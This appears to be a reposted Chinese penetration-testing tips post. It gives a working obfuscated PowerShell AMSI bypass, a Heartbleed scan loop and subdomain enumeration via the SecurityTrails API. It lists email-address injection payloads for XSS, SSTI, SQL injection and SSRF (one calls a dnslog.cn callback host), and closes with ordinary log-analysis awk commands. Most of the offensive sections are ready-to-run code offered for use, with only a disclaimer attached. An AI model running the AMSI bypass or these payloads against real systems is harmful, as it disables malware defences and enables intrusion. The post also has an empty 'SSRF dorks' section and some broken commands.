目录
-
Bypass AMSI
-
查询是否存在heart bleed漏洞
-
远程解压文件
-
Top25 ssrf dorks
-
使用SecurityTrails API查询子域名
-
邮件地址payload
-
Web server日志分析命令
Bypass AMSI
From: @TihanyiNorbert
$a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUt'+'ils')
$h="4456625220575263174452554847"
$s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " "
$b =$a.GetField($s,'NonPublic,Static')
$b.SetValue($null,$true)
查询是否存在heart bleed漏洞
cat list.txt | while read line ; do echo"QUIT" | openssl s_client -connect $line:443 2>&1 | grep'server extension "heartbeat" (id=15)' || echo $line: safe; done
远程解压文件
pip install remotezip
#列出远程压缩包文件内容
remotezip -l http://site/bigfile.zip
#解压里面的文件
remotezip "http://site/bigfile.zip" "file.txt"
Top25 ssrf dorks
使用SecurityTrails API查询子域名
去https://securitytrails.com/申请个免费的API
curl -s --request GET --url https://api.securitytrails.com/v1/domain/target.com/subdomains?apikey=API_KEY |jq '.subdomains[]' | sed 's/"//g' >test.txt 2>/dev/null &&sed "s/$/.target.com/" test.txt | sed 's/ //g' && rm test.tx
邮件地址payload
XSS
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
SSTI
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQL injection
"' OR 1=1 -- '" .com
"mail'); --" .com
SSRF
john.doe@abc123.dnslog.cn
john.doe@[127.0.0.1]
Web server日志分析命令
https://gist.github.com/hvelarde/ceac345c662429447959625e6feb2b47
通过状态码获取请求总数
awk '{print $9}' /var/log/apache2/access.log | sort | uniq -c | sort –rn
按照IP的请求数量排序
awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head | awk -v OFS='t' '{"host " $2 | getline ip;print $0, ip}'
按照ua的请求数量排序
awk -F'"' '{print $6}' /var/log/apache2/access.log| sort | uniq -c | sort -rn | head
按照url的请求数量排序
awk '{print $7}' /var/log/apache2/access.log |sort | uniq -c | sort -rn | head
按照请求页面为404的url排序
awk '$9 ~ /404/ {print $7}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head
按照请求致后端报错的IP排序
awk '$0 ~ /[error]/ && match($0,/(client: )(.*)(, server)/, arr) {print arr[2]}' /var/log/apache2/error.log |sort | uniq -c | sort -rn | awk -v OFS='t' '{"host " $2 | getlineip; print $0, ip}'
获取最近10分钟的请求
awk -v date=$(date +[%d/%b/%Y:%H:%M--date="-10 minutes") '$4 > date' /var/log/nginx/access.log
本文始发于微信公众号(关注安全技术):渗透Tips - 第十七期
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论